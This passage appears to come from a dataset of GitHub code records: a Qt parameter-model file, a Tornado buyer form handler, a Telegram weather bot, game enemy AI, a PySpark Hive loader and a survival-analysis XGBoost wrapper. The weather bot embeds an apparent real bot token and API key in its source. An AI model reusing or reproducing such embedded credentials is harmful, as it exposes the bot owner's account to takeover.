item[\"parameter_name\"], names, alternative_name)\n\n def get_set_data_delayed(self, index):\n \"\"\"Returns a function that ParameterValueEditor can call to set data for the given index at any later time,\n even if the model changes.\n\n Args:\n index (QModelIndex)\n\n Returns:\n function\n \"\"\"\n sub_model = self.sub_model_at_row(index.row())\n if sub_model == self.empty_model:\n return lambda value_and_type, index=index: self.setData(index, join_value_and_type(*value_and_type))\n id_ = self.item_at_row(index.row())\n value_field = {\"parameter_value\": \"value\", \"parameter_definition\": \"default_value\"}[self.item_type]\n return lambda value_and_type, sub_model=sub_model, id_=id_: sub_model.update_items_in_db(\n [{\"id\": id_, value_field: join_value_and_type(*value_and_type)}]\n )\n\n def get_entity_class_id(self, index, db_map):\n entity_class_name_key = {\"object_class\": \"object_class_name\", \"relationship_class\": \"relationship_class_name\"}[\n self.entity_class_type\n ]\n entity_class_name = index.sibling(index.row(), self.header.index(entity_class_name_key)).data()\n entity_class = 
self.db_mngr.get_item_by_field(db_map, self.entity_class_type, \"name\", entity_class_name)\n return entity_class.get(\"id\")\n\n def filter_by(self, rows_per_column):\n for column, rows in rows_per_column.items():\n field = self.headerData(column)\n menu = self._make_auto_filter_menu(field)\n accepted_values = {self.index(row, column).data(Qt.ItemDataRole.DisplayRole) for row in rows}\n menu.set_filter_accepted_values(accepted_values)\n\n def filter_excluding(self, rows_per_column):\n for column, rows in rows_per_column.items():\n field = self.headerData(column)\n menu = self._make_auto_filter_menu(field)\n rejected_values = {self.index(row, column).data(Qt.ItemDataRole.DisplayRole) for row in rows}\n menu.set_filter_rejected_values(rejected_values)\n\n\nclass CompoundObjectParameterMixin:\n \"\"\"Implements the interface for populating and filtering a compound object parameter model.\"\"\"\n\n @property\n def entity_class_type(self):\n return \"object_class\"\n\n\nclass CompoundRelationshipParameterMixin:\n \"\"\"Implements the interface for populating and filtering a compound relationship parameter model.\"\"\"\n\n @property\n def entity_class_type(self):\n return \"relationship_class\"\n\n\nclass CompoundParameterDefinitionMixin:\n \"\"\"Handles signals from db mngr for parameter_definition models.\"\"\"\n\n @property\n def item_type(self):\n return \"parameter_definition\"\n\n\nclass CompoundParameterValueMixin:\n \"\"\"Handles signals from db mngr for parameter_value models.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._filter_entity_ids = dict()\n self._filter_alternative_ids = dict()\n\n def init_model(self):\n super().init_model()\n self._filter_entity_ids = dict()\n self._filter_alternative_ids = dict()\n\n @property\n def item_type(self):\n return \"parameter_value\"\n\n @property\n def entity_type(self):\n \"\"\"Returns the entity type, either 'object' or 'relationship'\n Used by update_single_main_filter.\n\n Returns:\n str\n \"\"\"\n raise NotImplementedError()\n\n def set_filter_entity_ids(self, entity_ids):\n self._filter_entity_ids = entity_ids\n for model in self.single_models:\n if model.set_filter_entity_ids(entity_ids):\n self._invalidate_filter()\n\n def set_filter_alternative_ids(self, alternative_ids):\n self._filter_alternative_ids = alternative_ids\n for model in self.single_models:\n if model.set_filter_alternative_ids(alternative_ids):\n self._invalidate_filter()\n\n def _create_single_model(self, db_map, entity_class_id, committed):\n model = super()._create_single_model(db_map, entity_class_id, committed)\n model.set_filter_entity_ids(self._filter_entity_ids)\n model.set_filter_alternative_ids(self._filter_alternative_ids)\n return model\n\n\nclass CompoundObjectParameterDefinitionModel(\n CompoundObjectParameterMixin, CompoundParameterDefinitionMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single object parameter_definition models\n and one empty object parameter_definition model.\n \"\"\"\n\n def _make_header(self):\n return [\"object_class_name\", \"parameter_name\", \"value_list_name\", \"default_value\", \"description\", \"database\"]\n\n\nclass CompoundRelationshipParameterDefinitionModel(\n CompoundRelationshipParameterMixin, CompoundParameterDefinitionMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single relationship parameter_definition models\n and one empty relationship parameter_definition model.\n \"\"\"\n\n def _make_header(self):\n return [\n 
\"relationship_class_name\",\n \"object_class_name_list\",\n \"parameter_name\",\n \"value_list_name\",\n \"default_value\",\n \"description\",\n \"database\",\n ]\n\n\nclass CompoundObjectParameterValueModel(\n CompoundObjectParameterMixin, CompoundParameterValueMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single object parameter_value models\n and one empty object parameter_value model.\n \"\"\"\n\n def _make_header(self):\n return [\"object_class_name\", \"object_name\", \"parameter_name\", \"alternative_name\", \"value\", \"database\"]\n\n @property\n def entity_type(self):\n return \"object\"\n\n\nclass CompoundRelationshipParameterValueModel(\n CompoundRelationshipParameterMixin, CompoundParameterValueMixin, CompoundParameterModel\n):\n \"\"\"A model that concatenates several single relationship parameter_value models\n and one empty relationship parameter_value model.\n \"\"\"\n\n def _make_header(self):\n return [\n \"relationship_class_name\",\n \"object_name_list\",\n \"parameter_name\",\n \"alternative_name\",\n \"value\",\n \"database\",\n ]\n\n @property\n def entity_type(self):\n return \"relationship\"\n", "repo_name": "spine-tools/Spine-Toolbox", "sub_path": "spinetoolbox/spine_db_editor/mvcmodels/compound_parameter_models.py", "file_name": "compound_parameter_models.py", "file_ext": "py", "file_size_in_byte": 24136, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 54, "dataset": "github-code", "pt": "31", "api": [{"api_name": "mvcmodels.compound_table_model.CompoundWithEmptyTableModel", "line_number": 22, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QTimer", "line_number": 41, "usage_type": "call"}, {"api_name": "fetch_parent.FlexibleFetchParent", "line_number": 45, "usage_type": "call"}, {"api_name": "single_parameter_models.SingleObjectParameterDefinitionModel", "line_number": 102, "usage_type": "name"}, {"api_name": "single_parameter_models.SingleObjectParameterValueModel", "line_number": 103, "usage_type": "name"}, {"api_name": "single_parameter_models.SingleRelationshipParameterDefinitionModel", "line_number": 106, "usage_type": "name"}, {"api_name": "single_parameter_models.SingleRelationshipParameterValueModel", "line_number": 107, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyObjectParameterDefinitionModel", "line_number": 121, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyObjectParameterValueModel", "line_number": 122, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyRelationshipParameterDefinitionModel", "line_number": 125, "usage_type": "name"}, {"api_name": "empty_parameter_models.EmptyRelationshipParameterValueModel", "line_number": 126, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QModelIndex", "line_number": 151, "usage_type": "call"}, {"api_name": "widgets.custom_menus.ParameterViewFilterMenu", "line_number": 169, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.Orientation", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 181, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 181, "usage_type": "attribute"}, {"api_name": "PySide6.QtGui.QFont", "line_number": 183, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 186, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 186, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.Orientation", "line_number": 187, "usage_type": "attribute"}, 
{"api_name": "PySide6.QtCore.Qt", "line_number": 187, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Slot", "line_number": 262, "usage_type": "call"}, {"api_name": "helpers.rows_to_row_count_tuples", "line_number": 430, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 446, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 446, "usage_type": "name"}, {"api_name": "helpers.parameter_identifier", "line_number": 485, "usage_type": "call"}, {"api_name": "spinedb_api.parameter_value.join_value_and_type", "line_number": 499, "usage_type": "call"}, {"api_name": "spinedb_api.parameter_value.join_value_and_type", "line_number": 503, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 518, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 518, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemDataRole", "line_number": 525, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 525, "usage_type": "name"}]}
+{"seq_id": "69917192413", "text": "#!/usr/bin/env Python\n# coding=utf-8\n\nimport time\nimport tornado.web\nimport methods.readdb as mrd\nimport methods.insertdb as mrd\n\nclass BuyerHandler(tornado.web.RequestHandler):\n def get(self):\n #usernames = mrd.select_columns(table=\"user\",column=\"username\")\n #one_user = usernames[0][0]\n #self.render(\"index.html\", user=one_user)\n self.render(\"buyer.html\")\n\nclass BuyerAddHandler(tornado.web.RequestHandler):\n def get(self):\n #usernames = mrd.select_columns(table=\"user\",column=\"username\")\n #one_user = usernames[0][0]\n #self.render(\"index.html\", user=one_user)\n self.render(\"buyeradd.html\")\n\nclass BuyerAddNewHandler(tornado.web.RequestHandler):\n def post(self):\n weixinname = self.get_argument(\"weixinname\")\n phonenum = self.get_argument(\"phonenum\")\n sex = self.get_argument(\"sex\")\n age = self.get_argument(\"age\")\n username = self.get_argument(\"username\")\n address1 = self.get_argument(\"address1\")\n birsday = self.get_argument(\"birsday\")\n address2 = self.get_argument(\"address2\")\n # if not weixinname:\n # return None\n if not weixinname.strip() or not phonenum.strip() :\n self.write('this is error.\"微信号\\手机号\" 不能是空!')\n self.render(\"buyeradd.html\")\n else:\n bdate = time.strftime('%Y-%m-%d',time.localtime(time.time()))\n user_infos = mrd.buyer_insert_table(table=\"buyuser\",weixinname=weixinname,phonenum=phonenum,sex=sex,age=age,username=username,address1=address1,birsday=birsday,address2=address2,bdate=bdate)\n if not user_infos:\n self.write(\"数据添加成功!\")\n self.render(\"buyeradd.html\")\n else:\n self.write(\"this is error.\")", "repo_name": "levycui/xiyun", "sub_path": "handlers/buyerAdd.py", "file_name": "buyerAdd.py", "file_ext": "py", "file_size_in_byte": 1819, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "tornado.web.web", "line_number": 9, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 9, "usage_type": "name"}, {"api_name": "tornado.web.web", "line_number": 16, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 16, "usage_type": "name"}, {"api_name": "tornado.web.web", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tornado.web", "line_number": 23, "usage_type": "name"}, {"api_name": "time.strftime", "line_number": 39, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "methods.insertdb.buyer_insert_table", "line_number": 40, "usage_type": "call"}, {"api_name": "methods.insertdb", "line_number": 40, "usage_type": "name"}]}
+{"seq_id": "39598917699", "text": "import requests\nfrom telegram.ext import Updater, CommandHandler\n\n# Функция-обработчик команды /start\ndef start(update, context):\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Привет! Я бот погоды. Введите команду /weather <город>, чтобы узнать текущую погоду.\")\n\n# Функция-обработчик команды /weather\ndef weather(update, context):\n if len(context.args) == 0:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Пожалуйста, укажите город.\")\n return\n\n city = ' '.join(context.args)\n api_key = '56b30cb255.3443075' # Замените на ваш API-ключ погоды\n url = f\"http://api.openweathermap.org/data/2.5/weather?q={city}&appid={api_key}&units=metric\"\n\n response = requests.get(url)\n data = response.json()\n\n if data['cod'] == '404':\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Город не найден.\")\n return\n\n temperature = data['main']['temp']\n weather_desc = data['weather'][0]['description']\n message = f\"Текущая погода в {city}: {temperature}°C, {weather_desc}.\"\n\n context.bot.send_message(chat_id=update.effective_chat.id, text=message)\n\n# Инициализация бота и добавление обработчиков команд\nupdater = Updater(token='6568139398:AAGJQnWWrYGZkgH-djue2F5PSmKjMJ_5yaY', use_context=True) # Замените на токен вашего бота\n\nstart_handler = CommandHandler('start', start)\nweather_handler = CommandHandler('weather', weather)\n\nupdater.dispatcher.add_handler(start_handler)\nupdater.dispatcher.add_handler(weather_handler)\n\n# Запуск бота\nupdater.start_polling()\n", "repo_name": "HellCrow100500/Weather", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1826, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 18, "usage_type": "call"}, {"api_name": "telegram.ext.Updater", "line_number": 32, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 34, "usage_type": "call"}, {"api_name": "telegram.ext.CommandHandler", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "42868687948", "text": "import logging\nimport random\n\nfrom utilities.utilities import Utility\nfrom common.direction import Direction\nfrom common.coordinates import Coordinates\nfrom utilities.color import Color\nfrom config import Config\nfrom messaging import messaging, MessageType\nfrom utilities.entityfinder import EntityFinder\nimport system.graphics.renderable\nimport system.gamelogic.enemy\n\nlogger = logging.getLogger(__name__)\n\n\nclass AiHelper(object):\n @staticmethod\n def canAttackPlayer(owner, playerLocation):\n if playerLocation is None:\n return False\n\n meRenderable = owner.world.component_for_entity(\n owner.entity, system.graphics.renderable.Renderable)\n meOffensiveAttack = owner.world.component_for_entity(\n owner.entity, system.gamelogic.offensiveattack.OffensiveAttack)\n\n currentWeaponHitArea = meOffensiveAttack.getCurrentWeaponHitArea()\n\n if Config.showEnemyWeaponHitCollisionDetectionTargets:\n for hitlocation in currentWeaponHitArea.hitCd:\n messaging.add(\n type=MessageType.EmitTextureMinimal,\n data={\n 'char': 'X',\n 'timeout': 0.2,\n 'coordinate': hitlocation,\n 'color': Color.grey\n }\n )\n\n # only one of the hitlocations need to hit\n for hitLocation in currentWeaponHitArea.hitCd:\n canAttack = Utility.isPointInArea(\n hitLocation,\n playerLocation)\n if canAttack:\n return True\n return False\n\n\n @staticmethod\n def getAttackVectorToPlayer(owner, meRenderable):\n # enemy will walk to this distance\n # allows player to come close\n # but not inside of him, will walk backwards\n keepDistance = 1\n\n attackBaseLocation = meRenderable.getAttackBaseLocation()\n attackBaseLocationInverted = meRenderable.getAttackBaseLocationInverted()\n\n playerEntity = EntityFinder.findPlayer(owner.world)\n # player not spawned\n if not playerEntity:\n return\n\n plyrRend = owner.world.component_for_entity(\n playerEntity, system.graphics.renderable.Renderable)\n playerLocation = plyrRend.getLocation()\n\n # check distance, from both the direction we are facing, \n # and the other one\n distanceNormal = Utility.distance(playerLocation, attackBaseLocation)\n distanceInverted = Utility.distance(playerLocation, attackBaseLocationInverted)\n\n # logger.info(\"--- Loc Enemy : {} / {}\".format(\n # meRenderable.coordinates.x, \n # meRenderable.coordinates.x + meRenderable.texture.width - 1))\n # logger.info(\"--- Loc Player: {}\".format(playerRenderable.coordinates.x))\n\n # decide on which reference point we will take\n # and if we wanna change direction\n atkLoc = None\n dontChangeDirection = False\n if distanceNormal['x'] < distanceInverted['x']:\n # logger.info(\"--- n: {} i: {} dontChange, use normal\".format(\n # distanceNormal['x'], distanceInverted['x']\n # ))\n dontChangeDirection = True\n atkLoc = attackBaseLocation\n else:\n # logger.info(\"--- n: {} i: {} change, use inverted\".format(\n # distanceNormal['x'], distanceInverted['x']\n # ))\n dontChangeDirection = False\n atkLoc = attackBaseLocationInverted\n\n # logger.info(\"--- Loc Atk : {}\".format(attackLoc.x))\n\n moveX = 0\n moveY = 0\n # check if player overlaps with out attackpoint\n # if yes, we are too close\n if (atkLoc.x >= plyrRend.coordinates.x\n and atkLoc.x <= plyrRend.coordinates.x + plyrRend.texture.width - 1):\n # logger.info(\"--- Overlap :-(\")\n # if refLoc.x >= playerRenderable.coordinates.x:\n if meRenderable.direction is Direction.left:\n if Config.xDoubleStep:\n moveX = 2\n else:\n moveX = 1\n else:\n if Config.xDoubleStep:\n moveX = -2\n else:\n moveX = -1\n\n # 
logger.info(\"--- Overlap decision: {}\".format(moveX))\n\n else:\n # logger.info(\"--- No overlap :-)\")\n\n playerref = 0\n if atkLoc.x <= playerLocation.x + int(plyrRend.texture.width / 2):\n # logger.info(\"--- Enemy is left of player\")\n playerref = playerLocation.x\n else:\n # logger.info(\"--- Enemy is right of player. Ex:{} Px:{}\".format(\n # attackLoc.x, playerRenderable.coordinates.x\n # ))\n playerref = playerLocation.x + plyrRend.texture.width - 1\n\n tempDistance = atkLoc.x - playerref\n if tempDistance > keepDistance:\n if Config.xDoubleStep:\n moveX = -2\n else:\n moveX = -1\n elif tempDistance < -keepDistance:\n if Config.xDoubleStep:\n moveX = 2\n else:\n moveX = 1\n\n # logger.info(\"--- Distance: {} because {} - {} \".format(\n # tempDistance, attackLoc.x, playerref))\n\n # logger.info(\"--- Enemy: moveX: {} dontChangeDirection: {}\".format(\n # moveX, dontChangeDirection\n # ))\n\n # we can walk diagonally, no elif here\n if attackBaseLocation.y < playerLocation.y:\n moveY = 1\n elif attackBaseLocation.y > playerLocation.y + plyrRend.texture.height - 1:\n moveY = -1\n\n return moveX, moveY, dontChangeDirection\n\n\n @staticmethod\n def getVectorToPlayer(source, dest):\n x = 0\n y = 0\n if dest.x > source.x:\n if Config.xDoubleStep:\n x = 2\n else:\n x = 1\n elif dest.x < source.x:\n if Config.xDoubleStep:\n x = -2\n else:\n x = -1\n\n if dest.y > source.y:\n y = 1\n elif dest.y < source.y:\n y = -1\n\n return x, y\n\n\n @staticmethod\n def pickDestAroundPlayer(meRenderable, distanceX, distanceY):\n ptRight = random.choice([True, False])\n ptDown = random.choice([True, False])\n\n coord = Coordinates(\n meRenderable.getLocation().x,\n meRenderable.getLocation().y\n )\n\n if ptRight:\n coord.x += distanceX + random.randint(2, 6)\n else:\n coord.x -= distanceX + random.randint(2, 6)\n\n if ptDown:\n coord.y += distanceY + random.randint(-2, 2)\n #if coord.y > Config.rows - 2 - meRenderable.texture.height:\n # coord.y = Config.rows - 2 - meRenderable.texture.height\n else:\n coord.y -= distanceY + random.randint(-2, 2)\n # +1 so they can overlap only a bit on top\n #if coord.y < Config.topborder - meRenderable.texture.height + 1:\n # coord.y = Config.topborder - meRenderable.texture.height + 1\n\n # make sure destination is on-screen\n if coord.y < Config.topborder:\n coord.y = Config.topborder\n if coord.y > Config.rows + meRenderable.texture.height:\n coord.y = Config.rows + meRenderable.texture.height\n\n return coord\n", "repo_name": "dobin/nkeyrollover", "sub_path": "ai/aihelper.py", "file_name": "aihelper.py", "file_ext": "py", "file_size_in_byte": 7535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "32", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "system.graphics.renderable.graphics", "line_number": 24, "usage_type": "attribute"}, {"api_name": "system.graphics.renderable", "line_number": 24, "usage_type": "name"}, {"api_name": "system.graphics.renderable.gamelogic", "line_number": 26, "usage_type": "attribute"}, {"api_name": "system.graphics.renderable", "line_number": 26, "usage_type": "name"}, {"api_name": "config.Config.showEnemyWeaponHitCollisionDetectionTargets", "line_number": 30, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 30, "usage_type": "name"}, {"api_name": "messaging.messaging.add", "line_number": 32, "usage_type": "call"}, {"api_name": "messaging.messaging", "line_number": 32, "usage_type": "name"}, {"api_name": 
"messaging.MessageType.EmitTextureMinimal", "line_number": 33, "usage_type": "attribute"}, {"api_name": "messaging.MessageType", "line_number": 33, "usage_type": "name"}, {"api_name": "utilities.color.Color.grey", "line_number": 38, "usage_type": "attribute"}, {"api_name": "utilities.color.Color", "line_number": 38, "usage_type": "name"}, {"api_name": "utilities.utilities.Utility.isPointInArea", "line_number": 44, "usage_type": "call"}, {"api_name": "utilities.utilities.Utility", "line_number": 44, "usage_type": "name"}, {"api_name": "utilities.entityfinder.EntityFinder.findPlayer", "line_number": 62, "usage_type": "call"}, {"api_name": "utilities.entityfinder.EntityFinder", "line_number": 62, "usage_type": "name"}, {"api_name": "system.graphics.renderable.graphics", "line_number": 68, "usage_type": "attribute"}, {"api_name": "system.graphics.renderable", "line_number": 68, "usage_type": "name"}, {"api_name": "utilities.utilities.Utility.distance", "line_number": 73, "usage_type": "call"}, {"api_name": "utilities.utilities.Utility", "line_number": 73, "usage_type": "name"}, {"api_name": "utilities.utilities.Utility.distance", "line_number": 74, "usage_type": "call"}, {"api_name": "utilities.utilities.Utility", "line_number": 74, "usage_type": "name"}, {"api_name": "common.direction.Direction.left", "line_number": 108, "usage_type": "attribute"}, {"api_name": "common.direction.Direction", "line_number": 108, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 109, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 109, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 114, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 114, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 136, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 136, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 141, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 141, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 167, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 167, "usage_type": "name"}, {"api_name": "config.Config.xDoubleStep", "line_number": 172, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 172, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 187, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 188, "usage_type": "call"}, {"api_name": "common.coordinates.Coordinates", "line_number": 190, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 196, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 198, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 201, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 205, "usage_type": "call"}, {"api_name": "config.Config.topborder", "line_number": 211, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 211, "usage_type": "name"}, {"api_name": "config.Config.topborder", "line_number": 212, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 212, "usage_type": "name"}, {"api_name": "config.Config.rows", "line_number": 213, "usage_type": "attribute"}, {"api_name": "config.Config", "line_number": 213, "usage_type": "name"}, {"api_name": "config.Config.rows", "line_number": 214, "usage_type": "attribute"}, {"api_name": "config.Config", 
"line_number": 214, "usage_type": "name"}]}
+{"seq_id": "37727549285", "text": "import json\nfrom typing import Callable\n\nfrom pyspark import SparkContext, SparkConf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.types import *\n\n\ndef init_spark(app_name, warehouse_dir):\n conf = SparkConf().setAppName(app_name)\n sc = SparkContext(conf=conf)\n\n spark = (\n SparkSession.builder\n .config(\"spark.sql.warehouse.dir\", warehouse_dir)\n .enableHiveSupport()\n .getOrCreate()\n )\n\n return spark\n\n\ndef infer_schema(spark, json_data_list):\n # Create a temporary DataFrame to infer the schema\n temp_df = spark.read.json(spark.sparkContext.parallelize(\n [json.dumps(json_data_list[0])]), multiLine=True)\n\n # Return the inferred schema\n return temp_df.schema\n\n\ndef create_hive_table(spark, data, database_name, table_name):\n # Create the Hive database if needed\n spark.sql(f\"CREATE DATABASE IF NOT EXISTS {database_name}\")\n\n hive_table = f\"{database_name}.{table_name}\"\n spark.sql(f\"DROP TABLE IF EXISTS {hive_table}\")\n\n data.createOrReplaceTempView(\"data_view\")\n spark.sql(\n f\"CREATE TABLE {hive_table} USING parquet OPTIONS('compression'='snappy') AS SELECT * FROM data_view\")\n\n\ndef read_config(config_file):\n with open(config_file, \"r\") as f:\n config = json.load(f)\n return config\n\n\ndef process_data(read_json_data: Callable):\n # Read the config.json file\n config = read_config(\"config.json\")\n\n # Initialize Spark\n spark = init_spark(\"Spark-Streaming\", config[\"local\"][\"warehouse_dir\"])\n\n # Get the JSON data\n json_data_list = read_json_data(config)\n\n # Get schema from the JSON data\n schema = infer_schema(spark, json_data_list)\n\n # Create a DataFrame from the data\n data = spark.createDataFrame(json_data_list, schema=schema)\n\n # Load the Hive table\n create_hive_table(\n spark, data, config[\"database_name\"], config[\"table_name\"])\n\n\nif __name__ == \"__main__\":\n raise Exception(\n \"Please run either google_cloud_script.py or local_script.py\")\n", "repo_name": "Eu-Bitwise/spark-json-streaming", "sub_path": "app/common.py", "file_name": "common.py", "file_ext": "py", "file_size_in_byte": 2009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "pyspark.SparkConf", "line_number": 10, "usage_type": "call"}, {"api_name": "pyspark.SparkContext", "line_number": 11, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder.config", "line_number": 14, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 14, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 26, "usage_type": "call"}, {"api_name": "json.load", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Callable", "line_number": 50, "usage_type": "name"}]}
+{"seq_id": "32766871771", "text": "from xgbsurv.models.breslow_final import breslow_likelihood, breslow_objective, \\\n get_cumulative_hazard_function_breslow\nfrom xgbsurv.models.efron_final import efron_likelihood, efron_objective, \\\n get_cumulative_hazard_function_efron\nfrom xgbsurv.models.cind_final import cind_loss, cind_objective \nfrom xgbsurv.models.deephit_pycox_final import deephit_loss1_pycox, deephit_pycox_objective \nfrom xgbsurv.models.eh_aft_final import aft_likelihood, aft_objective, \\\n get_cumulative_hazard_function_aft\nfrom xgbsurv.models.eh_ah_final import ah_likelihood, ah_objective, \\\n get_cumulative_hazard_function_ah\nfrom xgbsurv.models.eh_final import eh_likelihood, eh_objective,\\\n get_cumulative_hazard_function_eh\nfrom xgbsurv.models.utils import transform_back, sort_X_y_pandas\nfrom xgbsurv.docstrings.xgbsurv_docstrings import get_xgbsurv_docstring, \\\nget_xgbsurv_fit_docstring\nfrom xgboost import XGBRegressor\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\n\n# dicts of objective, loss and prediction functions\nloss_dict = {\n 'breslow_loss': breslow_likelihood, \n 'efron_loss': efron_likelihood, \n 'cind_loss': cind_loss, \n 'deephit_loss':deephit_loss1_pycox, \n 'aft_loss':aft_likelihood, \n 'ah_loss':ah_likelihood, \n 'eh_loss': eh_likelihood\n }\n\n\nobjective_dict = {\n 'breslow_objective': breslow_objective,\n 'efron_objective': efron_objective, \n 'cind_objective': cind_objective, \n 'deephit_objective':deephit_pycox_objective, \n 'aft_objective':aft_objective, \n 'ah_objective':ah_objective,\n 'eh_objective': eh_objective\n }\n\npred_dict = {\n 'breslow_objective': get_cumulative_hazard_function_breslow, \n 'efron_objective': get_cumulative_hazard_function_efron, \n 'aft_objective': get_cumulative_hazard_function_aft,\n 'ah_objective': get_cumulative_hazard_function_ah,\n 'eh_objective': get_cumulative_hazard_function_eh,\n }\n\nclass XGBSurv(XGBRegressor):\n \"\"\"XGBSurv - Gradient Boosted Decision Trees for Survival Analysis.\"\"\"\n __doc__ = get_xgbsurv_docstring()\n\n def __init__(self, *, objective=None, eval_metric=None, **kwargs) -> None:\n self.cum_hazard_baseline = None\n self.model_type = None\n if objective in objective_dict:\n obj = objective_dict[objective]\n self.model_type = objective\n elif callable(objective):\n obj = objective\n else:\n obj = objective\n\n if eval_metric in loss_dict:\n eval_loss = loss_dict[eval_metric]\n elif callable(objective):\n eval_loss = eval_metric\n else:\n eval_loss = eval_metric \n\n super().__init__(objective=obj, eval_metric= eval_loss, **kwargs)\n #disable_default_eval_metric=disable,\n\n def fit(self, X, y, *, eval_test_size=None, **kwargs):\n __doc__ = get_xgbsurv_fit_docstring()\n\n #print('types',type(X),type(y))\n #Ct transforms to numpy array to mixtures are expected\n if isinstance(X, np.ndarray) and isinstance(y, pd.Series):\n y = y.values\n \n if isinstance(X, np.ndarray) and isinstance(y, pd.DataFrame):\n y = y.values\n\n if isinstance(X, pd.DataFrame) and isinstance(y, pd.Series):\n X, y = sort_X_y_pandas(X, y)\n elif isinstance(X, np.ndarray) and isinstance(y, np.ndarray):\n X, y = self._sort_X_y(X, y)\n else:\n print(\"Data type is not correct - use either pandas DataFrame/Series or numpy ndarray. 
\")\n\n if eval_test_size is not None:\n \n params = super(XGBRegressor, self).get_xgb_params()\n \n #TODO: verify for deephit split\n #target_sign = np.sign(y) beware of deephit dims\n X_train, X_test, y_train, y_test = train_test_split(\n X, \n y, \n test_size=eval_test_size,\n random_state=params['random_state'],\n stratify=np.sign(y)) \n #print('types2',type(X_train),type(y_train))\n #print('types3',type(X_test),type(y_test))\n #print('shapes', X_train.shape,y_train.shape)\n #print('shapes 2', X_test.shape,y_test.shape)\n if isinstance(X_train, pd.DataFrame) and isinstance(y_train, pd.Series):\n X_train, y_train = sort_X_y_pandas(X_train, y_train)\n\n elif isinstance(X_train, np.ndarray) and isinstance(y_train, np.ndarray):\n X_train, y_train = self._sort_X_y(X_train, y_train)\n\n elif isinstance(X_test, pd.DataFrame) and isinstance(y_test, pd.Series):\n X_test, y_test = sort_X_y_pandas(X_test, y_test)\n\n elif isinstance(X_test, np.ndarray) and isinstance(y_test, np.ndarray):\n X_test, y_test = self._sort_X_y(X_test, y_test)\n # eh case\n elif isinstance(X_train, pd.DataFrame) and isinstance(y_train, pd.DataFrame):\n X_train, y_train = sort_X_y_pandas(X_train, y_train)\n \n elif isinstance(X_test, pd.DataFrame) and isinstance(y_test, pd.DataFrame):\n X_test, y_test = sort_X_y_pandas(X_test, y_test)\n\n else:\n print(\"Data type is not correct - use either pandas DataFrame/Series or numpy ndarray. \")\n \n\n # 1. column training loss\n # 2. column separat validation set loss\n eval_set = [(X_train, 